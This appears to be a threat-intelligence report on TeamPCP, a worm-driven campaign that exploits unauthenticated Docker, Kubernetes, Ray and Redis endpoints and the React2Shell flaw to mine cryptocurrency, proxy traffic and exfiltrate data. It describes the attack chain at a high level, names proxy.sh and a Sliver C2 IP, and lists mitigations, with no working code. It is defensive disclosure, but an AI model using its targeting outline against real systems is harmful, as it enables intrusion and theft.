TeamPCP’s Cloud‑Native Worm‑Driven Campaign Targets Docker, Kubernetes, and React2Shell

Overview

Security researchers have identified a large‑scale, worm‑driven operation that began around 25 December 2025. The campaign, attributed to the threat cluster TeamPCP (also known as DeadCatx3, PCPcat, PersyPCP and ShellForce), systematically abuses misconfigured cloud‑native services to create a distributed proxy, scanning, and data‑exfiltration infrastructure.

Attack Infrastructure

TeamPCP treats modern cloud environments as a “self‑propagating criminal ecosystem.” By scanning the internet for exposed Docker APIs, Kubernetes clusters, Ray dashboards and Redis instances, the group automatically deploys a chain of payloads that:

• Establish a foothold on the compromised host.
• Fingerprint the environment (e.g., detect Kubernetes).
• Drop secondary, cluster‑specific payloads.
• Install proxy, P2P and tunneling utilities via proxy.sh.
• Connect to a Sliver‑based C2 server (67.217.57[.]240).

Exploited Services & Vulnerabilities

The operation relies on publicly known weaknesses rather than novel zero‑days:

• Unauthenticated Docker Engine API endpoints.
• Open Kubernetes API servers and dashboard interfaces.
• Unprotected Ray dashboard ports.
• Exposed Redis instances without authentication.
• React2Shell vulnerability (CVE‑2025‑55182, CVSS 10.0) in vulnerable React/Next.js applications.

Malware Components

Key binaries and scripts used by TeamPCP include:

• proxy.sh – installs proxies, P2P tools and continuous scanners.
• Shell‑ and Python‑based payloads that retrieve additional modules from external servers.
• Cluster‑specific secondary payloads that run only inside Kubernetes environments.
• Sliver open‑source C2 framework for post‑exploitation command and control.

Operational Impact

Compromised infrastructure is monetized through multiple channels:

• Cryptocurrency mining on hijacked compute resources.
• Data hosting and proxy services for other criminal actors.
• Exfiltration of credential dumps, identity records and corporate data, later published via the ShellForce Telegram channel.
• Ransomware deployment, extortion and fraud enabled by the stolen information.

The group’s Telegram channel, with over 700 members, regularly shares stolen data from victims in Canada, Serbia, South Korea, the U.A.E. and the United States.

Mitigation & Defense

Defenders should adopt a layered approach:

• Enforce strict authentication and network segmentation for Docker, Kubernetes and Redis endpoints.
• Patch React/Next.js applications for CVE‑2025‑55182 immediately.
• Monitor for anomalous outbound traffic to known C2 IPs (e.g., 67.217.57.240) and for the execution of proxy.sh or similar scripts.
• Deploy threat‑intel feeds that flag the TeamPCP identifiers and associated IOCs.
• Utilize AI‑assisted, context‑aware forensics to accelerate cloud investigation and isolate compromised workloads.

Conclusion

TeamPCP’s campaign demonstrates that sophisticated, cloud‑native cybercrime can be built on well‑known tools and misconfigurations. The real danger lies in the automation, scale and integration of scanning, exploitation, persistence and monetization stages, turning ordinary cloud assets into a profitable criminal platform. Prompt remediation of exposed services and continuous monitoring are essential to disrupt this evolving threat landscape.